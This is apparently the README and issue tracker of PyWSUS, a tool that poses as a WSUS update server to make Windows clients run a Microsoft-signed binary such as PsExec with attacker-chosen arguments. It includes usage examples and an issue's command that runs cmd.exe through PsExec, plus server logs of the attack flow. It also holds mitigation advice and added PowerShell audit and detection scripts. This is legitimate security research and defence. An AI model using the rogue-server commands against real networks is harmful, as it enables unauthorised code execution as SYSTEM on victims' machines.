
PyWSUS

The main goal of this tool is to be a standalone server that speaks the WSUS client protocol like a legitimate WSUS server but returns malicious responses to clients (a Microsoft-signed executable with attacker-chosen arguments). The MITM attack itself should be done with other dedicated tools, such as Bettercap.

Installation

virtualenv -p /usr/bin/python3 ./venv
source ./venv/bin/activate
pip install -r ./requirements.txt

Usage

Usage: pywsus.py [-h] -H HOST [-p PORT] -c COMMAND -e EXECUTABLE [-v]

OPTIONS:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The listening address.
  -p PORT, --port PORT  The listening port.
  -c COMMAND, --command COMMAND
                        The parameters for the current payload.
  -e EXECUTABLE, --executable EXECUTABLE
                        The executable to return to the victim. It has to be signed by Microsoft, e.g., PsExec.
  -v, --verbose         Increase output verbosity.

Example: python pywsus.py -c '/accepteula /s calc.exe' -e PsExec64.exe

Mitigations

The most effective mitigation is to force WSUS deployments to use HTTPS between clients and the WSUS server, so that a man-in-the-middle cannot substitute the update metadata and the binaries the client downloads.

The Windows Update client must validate the certificate presented by the WSUS server; if the certificate does not validate, the client closes the connection.

The three main ways of obtaining a certificate for a WSUS server are:

  • Using an internal PKI whose root CA certificate is deployed to domain computers, and serving WSUS updates with a certificate signed by that CA
  • Purchasing a certificate from a third-party CA that is already trusted by the Windows trust store
  • Using a self-signed certificate and pushing a copy of it to all domain computers through a GPO
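The PowerShell script below is an added example, not part of pywsus or the research it comes from. It audits a Windows client for the weak configuration this tool depends on: it reads the WSUS client policy from the documented registry location (HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and its AU subkey), flags WUServer and WUStatusServer URLs that are not https://, and, for an https:// server, opens a TLS connection and lets .NET validate the certificate chain against the machine trust store, which is the check that fails against a rogue server presenting an untrusted certificate. The function names are this example's own.

```powershell
# Added example (not part of pywsus): audit a Windows client's WSUS policy for
# the plaintext-HTTP configuration a rogue WSUS server relies on.

function Get-WsusClientPolicy {
    # Documented WSUS client policy locations (written by the Windows Update GPO).
    $wu = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $p  = Get-ItemProperty -Path $wu      -ErrorAction SilentlyContinue
    $a  = Get-ItemProperty -Path "$wu\AU" -ErrorAction SilentlyContinue
    [pscustomobject]@{
        UseWUServer    = [int]($a.UseWUServer)   # 1 = use the intranet server below
        WUServer       = $p.WUServer             # update metadata / content URL
        WUStatusServer = $p.WUStatusServer       # reporting (ReportEventBatch) URL
    }
}

function Test-WsusClientPolicy {
    # Returns one finding per weak or missing setting; nothing if the policy is sound.
    param([Parameter(Mandatory)] $Policy)
    $findings = @()
    if ($Policy.UseWUServer -ne 1) {
        $findings += 'UseWUServer is not 1: this client does not use an intranet WSUS server.'
        return $findings
    }
    foreach ($name in 'WUServer', 'WUStatusServer') {
        $url = $Policy.$name
        if (-not $url) { $findings += "$name is not set."; continue }
        try { $uri = [uri]$url } catch { $findings += "$name is not a valid URL: $url"; continue }
        if ($uri.Scheme -ne 'https') {
            $findings += "$name uses $($uri.Scheme)://, so a man-in-the-middle can substitute update metadata and binaries: $url"
        }
    }
    return $findings
}

function Test-WsusServerCertificate {
    # Open a TLS connection and let .NET validate the chain and host name against
    # the machine trust store, as a correctly configured Windows Update client does.
    param([Parameter(Mandatory)] [uri] $Url)
    $tcp = [System.Net.Sockets.TcpClient]::new($Url.Host, $Url.Port)
    try {
        $ssl = [System.Net.Security.SslStream]::new($tcp.GetStream(), $false)
        $ssl.AuthenticateAsClient($Url.Host)   # throws if the chain is untrusted or the name does not match
        $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]$ssl.RemoteCertificate
        [pscustomobject]@{ Valid = $true;  Subject = $cert.Subject; Issuer = $cert.Issuer; NotAfter = $cert.NotAfter; Error = $null }
    } catch {
        [pscustomobject]@{ Valid = $false; Subject = $null; Issuer = $null; NotAfter = $null; Error = $_.Exception.Message }
    } finally {
        $tcp.Dispose()
    }
}

# Run the audit on this host.
$policy = Get-WsusClientPolicy
$policy | Format-List
Test-WsusClientPolicy -Policy $policy

# Only an https:// server can be checked for a trusted certificate.
$serverUri = $policy.WUServer -as [uri]
if ($serverUri -and $serverUri.Scheme -eq 'https') {
    Test-WsusServerCertificate -Url $serverUri
}
```

The script only covers the client side. On the server, the WSUS site also needs an HTTPS binding (8531 is the default WSUS SSL port) and must be switched to SSL with wsusutil.exe configuressl, and every client GPO must point at the https:// URL; an https:// WUServer with an http:// WUStatusServer still leaks the reporting traffic, which is why both values are checked.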

On the detection side, clients enrolled with WSUS periodically report their installed-update inventory. Looking for installed updates that stand out from the ones approved and deployed through WSUS could be a way to detect such an attack. This is a preliminary idea that we have not explored yet. Let us know on Twitter or LinkedIn if you have experience doing this kind of installed-patch differential analysis at the scale of an organization.
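As an added example (not the authors' code, and a sketch of the idea rather than anything the project ships), the PowerShell below performs the differential described above from the client side. It reads the Windows Update agent's own history through the Microsoft.Update.Session COM API, keeps installation operations, and flags entries the client attributes to the WSUS service whose update ID is not in the set approved on the WSUS server. The approved set and the sample history are constructed; the UUID in the second sample entry is the one pywsus prints for its injected update in an issue report further down this page. The line that collects the approved set from a real WSUS server with Get-WsusUpdate is shown as a comment and its property path should be verified on your WSUS version.

```powershell
# Added example (not part of pywsus): flag updates the Windows Update agent
# installed from WSUS that were never approved on the WSUS server.

$WsusServiceId = '3da21691-e39d-4da6-8a4b-b43877bcb1b7'   # well-known ServiceID of the WSUS service

function Get-ClientUpdateHistory {
    # The agent's own history, read through the same COM API the Windows Update client uses.
    $session  = New-Object -ComObject Microsoft.Update.Session
    $searcher = $session.CreateUpdateSearcher()
    $count    = $searcher.GetTotalHistoryCount()
    if ($count -eq 0) { return @() }
    foreach ($entry in $searcher.QueryHistory(0, $count)) {
        if ($entry.Operation -ne 1) { continue }   # 1 = installation, 2 = uninstallation
        [pscustomobject]@{
            UpdateId   = [guid]$entry.UpdateIdentity.UpdateID
            Revision   = $entry.UpdateIdentity.RevisionNumber
            Title      = $entry.Title
            Date       = $entry.Date
            ResultCode = $entry.ResultCode         # 2 = succeeded, 4 = failed; failed attempts are kept on purpose
            ServiceId  = $entry.ServiceID
        }
    }
}

function Find-UnapprovedWsusInstalls {
    # Differential: history entries from the WSUS service whose UpdateId is not approved.
    param(
        [Parameter(Mandatory)] [object[]] $History,
        [Parameter(Mandatory)] [guid[]]   $ApprovedUpdateIds
    )
    $approved = [System.Collections.Generic.HashSet[guid]]::new([guid[]]$ApprovedUpdateIds)
    foreach ($h in $History) {
        if ($h.ServiceId -ne $WsusServiceId) { continue }   # only updates the client attributes to WSUS
        if ($approved.Contains($h.UpdateId)) { continue }
        $h
    }
}

# Constructed sample data (not output from any real system). The second entry
# reuses the update UUID that pywsus logs for its injected update.
$approvedIds = @(
    [guid]'11111111-1111-1111-1111-111111111111'
)
$sampleHistory = @(
    [pscustomobject]@{
        UpdateId   = [guid]'11111111-1111-1111-1111-111111111111'
        Revision   = 200
        Title      = 'Approved cumulative update (constructed)'
        Date       = [datetime]'2022-11-24'
        ResultCode = 2
        ServiceId  = $WsusServiceId
    },
    [pscustomobject]@{
        UpdateId   = [guid]'ba4be06f-7b7d-4a0e-a27a-29b333009561'
        Revision   = 915630
        Title      = 'Update delivered by a rogue WSUS server (constructed)'
        Date       = [datetime]'2022-11-24'
        ResultCode = 2
        ServiceId  = $WsusServiceId
    }
)

Find-UnapprovedWsusInstalls -History $sampleHistory -ApprovedUpdateIds $approvedIds |
    Format-Table UpdateId, Revision, ResultCode, Title, Date -AutoSize

# Against a real client and a real approved list:
#   On the WSUS server (UpdateServices module; verify the property path on your version):
#     $approvedIds = (Get-WsusUpdate -Approval Approved).Update.Id.UpdateId
#   On the client:
#     Find-UnapprovedWsusInstalls -History (Get-ClientUpdateHistory) -ApprovedUpdateIds $approvedIds
```

With the constructed data, the only entry reported is the one whose UpdateId is absent from the approved set. The comparison is on update IDs rather than KB numbers because a rogue server controls the title and KB text it advertises, and because the history also records failed installation attempts, which are worth seeing. Run at scale, the approved set is collected once on the WSUS server and the history on each endpoint (for example through remoting), and a hit on any host is a strong signal since a legitimately approved update can never be missing from the server's own approval list.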

Acknowledgements

For their contributions to this research and blog post:

  • Olivier Bilodeau from GoSecure
  • Romain Carnus from GoSecure
  • Laurent Desaulniers from GoSecure
  • Maxime Nadeau from GoSecure
  • Mathieu Novis from SecureOps

For writing and researching the original proxy PoC:

  • Paul Stone and Alex Chapman from Context Information Security

Issues

Windows 10 not downloading PsExec.exe and executing it (Also not downloading other Windows Signed binaries)

I went through the other open and resolved issues and it seems like some other people had a similar issue but slightly different behaviour.

The target Windows 10 system does not have internet access and also has CrowdStrike Falcon running (not getting any alerts that behaviour is being blocked, but I may not see them since it's running as SYSTEM instead of my user).

Instead of ARP spoofing I am adding a static DNS entry to the DNS server to point at my linux machine running pywsus

It works successfully for the most part, and I get SyncUpdates and GetExtendedUpdateInfo, as seen below:

```
$ python3 pywsus.py -H 192.168.2.38 -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami >> C:\\poc.txt "'        
INFO:root:The update metadata - uuids: [UUID('ba4be06f-7b7d-4a0e-a27a-29b333009561'), UUID('4a6379ce-7c31-4add-a7d0-96a2638c0da1')],revision_ids: [915630, 941906], deployment_ids: [98449, 93574], executable: PsExec64.exe, sha1: /XmA0+Q38oAA+oFVdKMm5WnrVI4=, sha256: WRC0nAQbgPbo0ujhB1KpBi/r5KLt0V8HxrGWGzx5wSk=
INFO:root:Starting httpd...

192.168.2.129 - - [24/Nov/2022 12:01:05] "POST /ClientWebService/client.asmx HTTP/1.1" 200 -
INFO:root:SOAP Action: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"
192.168.2.129 - - [24/Nov/2022 12:01:10] "POST /ClientWebService/client.asmx HTTP/1.1" 200 -
INFO:root:SOAP Action: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetExtendedUpdateInfo"
```

I am not getting any GET request for PsExec64.exe. I have tried other Windows-signed binaries and get the exact same behaviour as above.

On the Windows 10 side, when I click "Check for Updates", the above requests show up on the WSUS server and a new update appears in Windows but does not complete; it gets stuck with the status:
Status: Downloading - 0%

I have tried all the basic troubleshooting steps with no luck. I've tried rebooting multiple times, letting it check for updates from the legitimate server, then grabbing updates from the malicious server, with the same behaviour. I have also made sure the endpoint protection and AWS are not blocking PsExec64.exe; I am able to run PsExec64 with no problem on the system as a non-admin.

My theories for why I'm having this issue:

  • No internet access when connected to the malicious WSUS server (long story, but the real WSUS server is reached through an always-on VPN; if I connect to the internet my default route gets overwritten by the VPN and I can't connect to my local machines)
  • Endpoint protection is stopping the attack, but I can't find any info about CrowdStrike blocking these types of attacks

I'm mostly wondering what may cause Windows not to download the binaries. I see that was a problem in a previous issue, but the resolution was unclear, although in that issue the Windows update was not getting stuck at 0%.

To recreate my network conditions, I have the Windows machine set up with a static IP, a bogus default gateway (to stop the internet connection) and the DNS server set to a local dnsmasq server that resolves the WSUS hostname to another host on my subnet.

PsExec is not downloaded and executed from the Windows host

Hello,

I have the following test case:

  1. The Windows 10 build is 19041.76, in a domain.
  2. For the MITM portion, I configured the WSUS server via gpedit to be my pywsus server (running on Debian 10).
  3. My pywsus server receives a SyncUpdates and a GetExtendedUpdateInfo is triggered.
  4. The Windows host does not download my PsExec at http://<WSUS_IP>:8530/8c1dee0a-8dfa-48c9-b21f-9993ec978214/PsExec64.exe

[edit: I managed to get the GetExtendedUpdateInfo once I joined a domain, as you mentioned in another issue. Do you know what registry keys are involved?]

Thanks for your time,

Compile

Thanks in advance:

error NU1101: Titanium.Web.Proxy package not found. There is no package with this id in the origins: Microsoft Visual Studio Offline Packages
\WSuspicious.csproj

No more WUServer on latest Windows

Windows Update now uses the domain download.windowsupdate.com for XMLs and au.download.windowsupdate.com for receiving files, and the IP always changes; on almost every request it's different, the source port also always changes and the destination port is always 80. Could this still be used with MITM in this case? Any directions on how to do it for the latest Windows 10? Is this WUServer compatible with the latest Windows?

Cannot replicate the PoC on Windows 10

Does the tool still correctly respond to syncupdates requests initiated on Windows 10 machines?

I have tried to replicate the PoC and set up a lab domain (Hyper-V) with a single domain controller (Server 2016) and a single domain-joined Win10. WSUS has been configured with setting 3 and enabled.

After successfully ARP poisoning and having "arp -a" show the MAC address of the Kali where pywsus is running, pywsus was able to receive update requests. Whenever 'check for updates' is clicked on Win10, pywsus receives a SyncUpdates SOAP HTTP request. However, unlike in the PoC, a GetExtendedUpdateInfo request is never received by pywsus.

The Win10 updates GUI shows an error (code 80240439) contacting the update server.

The Win10 WSUS update log shows the following (selected extract for brevity):

2021/04/28 12:40:08.8297096 1224 7052 WebServices Auto proxy settings for this web service call.
2021/04/28 12:40:08.8784820 1224 7052 WebServices FAILED [80240439] Web service call
2021/04/28 12:40:08.8784833 1224 7052 WebServices Current service auth scheme=0.
2021/04/28 12:40:08.8784839 1224 7052 WebServices Current Proxy auth scheme=0.
2021/04/28 12:40:08.8785000 1224 7052 Misc Got WSUS Client/Server URL: http://WIN-LUL8KLLSCLH:8530/ClientWebService/client.asmx""
2021/04/28 12:40:08.8807925 1224 7052 WebServices Proxy Behavior set to 1 for service url http://WIN-LUL8KLLSCLH:8530/ClientWebService/client.asmx
2021/04/28 12:40:08.8807971 1224 7052 ProtocolTalker FAILED [80240439] SyncUpdates_WithRecovery failed
2021/04/28 12:40:08.8808013 1224 7052 IdleTimer WU operation (CAgentProtocolTalker::SyncUpdates_WithRecover, operation # 1303) stopped; does use network; is at background priority
2021/04/28 12:40:08.8808067 1224 7052 ProtocolTalker SyncUpdates round trips: 1
2021/04/28 12:40:08.8808077 1224 7052 ProtocolTalker FAILED [80240439] Sync of Updates
2021/04/28 12:40:08.8808160 1224 7052 ProtocolTalker FAILED [80240439] SyncServerUpdatesInternal failed
2021/04/28 12:40:08.8845612 1224 7052 Agent FAILED [80240439] Synchronize

The Windows 10 VM details are as follows:

Host Name: WIN10
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.18363 N/A Build 18363
OS Manufacturer: Microsoft Corporation
Hotfix(s): 10 Hotfix(s) Installed.
[01]: KB4601056
[02]: KB4513661
[03]: KB4516115
[04]: KB4517245
[05]: KB4521863
[06]: KB4577586
[07]: KB4580325
[08]: KB4589211
[09]: KB5001406
[10]: KB5001337

I am wondering if there is either a configuration setting that is required for this to be exploitable that I may have missed, or changes may have been made to the communication protocol wherein the SOAP response from pywsus is not considered valid, or security changes have been made that stop the rogue WSUS server from successfully proceeding to patch downloading.

Note that I have tried this with both the Windows firewall and Windows Defender disabled and enabled, with the same outcome.

PoC Failure on Win10 - Not domain joined

Trying to replicate the PoC in a simple setting involving two Win10 boxes with a direct network connection (i.e., no MITM involved), the process gets stuck after the SyncUpdates phase.

Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request. However, unlike in the PoC, a GetExtendedUpdateInfo request is never received by pywsus.

Setup

Client (Win10, 10.0.0.14 ) <----------> pywsus (Win10, 10.0.0.4, local firewall disabled)

Client

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~3003 MHz
Domain: WORKGROUP
Hotfix(s): 11 Hotfix(s) Installed.
[01]: KB5004331
[02]: KB4577266
[03]: KB4577586
[04]: KB4580325
[05]: KB4586864
[06]: KB4589212
[07]: KB4593175
[08]: KB4598481
[09]: KB5000736
[10]: KB5004237
[11]: KB5003742

PYWSUS

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1803 MHz
Domain: WORKGROUP
Hotfix(s): 11 Hotfix(s) Installed.
[01]: KB5004331
[02]: KB4562830
[03]: KB4577266
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB4589212
[08]: KB4593175
[09]: KB4598481
[10]: KB5004237
[11]: KB5003742

Windows Update Client + WSUS Configuration

Client configuration via GPO

  • Internal update server + intranet server for statistics: http://10.0.0.4:8530
  • no connection to MS Windows Update Servers allowed
  • setting 3 enabled

pywsus is run with simplified command line: python pywsus.py -v -H 10.0.0.4 -p 8530 -e PsExec64.exe -c "/accepteula"

Results + Output of tools

Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request and responds. However, a GetExtendedUpdateInfo request is never received by pywsus. After some time the client initiates a ReportEventBatch action, which pywsus answers.

  • The Win10 updates GUI shows no error, but also no available updates.
  • The WindowsUpdateClient eventlog just contains an event with ID 26 (no updates found), but no errors.
  • The WindowsUpdate log file (etl) is attached: WindowsUpdate.20210802.etl.txt
  • The output of pywsus is as follows: pywsus_output.txt

Code 501, message Unsupported method ('HEAD')

Hi, I have tested pywsus on Kali. The Windows platform is Windows 7. The pywsus Python server responded with the following error message:

192.168.124.160 - - [10/Sep/2020 04:51:09] code 501, message Unsupported method ('HEAD')
192.168.124.160 - - [10/Sep/2020 04:51:09] "HEAD /selfupdate/wuident.cab?2009100851 HTTP/1.1" 501 -
INFO:root:Requested: /selfupdate/wuident.cab?2009100851
192.168.124.160 - - [10/Sep/2020 04:51:09] "GET /selfupdate/wuident.cab?2009100851 HTTP/1.1" 200 -

Exception happened during processing of request from ('192.168.124.160', 49164)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 293, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 716, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 283, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 307, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

pywsus server doesn't respond

Hi! Thanks a lot for your research. It's really great. Tried to reproduce your results in a lab environment and created a domain.
It consists of two machines:

  • DC: Windows Server 2016 Standard 1607 14393.0
  • PC: Windows 10 Education 1909 18363.1198

Added and configured WSUS on the DC.

Started everything as in the video, but nothing seems to happen. pywsus doesn't react after ARP spoofing and the host's update request. Tried to run the server on both Kali and Parrot OS.

Never installed WSUS before. Don't know what the problem is. Maybe you can share your lab environment (setup) or suggest where to look?

